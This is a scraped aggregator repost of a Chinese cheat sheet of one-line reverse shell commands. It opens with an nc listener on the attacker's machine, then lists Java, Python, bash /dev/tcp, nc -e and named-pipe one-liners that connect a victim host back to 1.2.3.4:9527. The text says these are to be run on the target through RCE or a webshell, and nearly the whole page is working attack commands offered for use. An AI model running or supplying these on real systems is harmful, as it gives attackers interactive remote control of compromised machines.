4
各种语言的一句话反弹 shell 命令
source link: https://exp-blog.com/safe/ge-chong-yu-yan-yi-ju-hua-fan-dan-shell/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
攻击主机先监听端口
最简单的脚本可以用 nc :
nc -lvvp 9527
被攻击主机连接到服务端口
一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了:
Runtime.getRuntime().exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9527;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);
Python
python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i >& /dev/tcp/1.2.3.4/9527 0>&1
nc -e /bin/sh 1.2.3.4 9527
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 1.2.3.4 9527 1>/tmp/backpipe
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK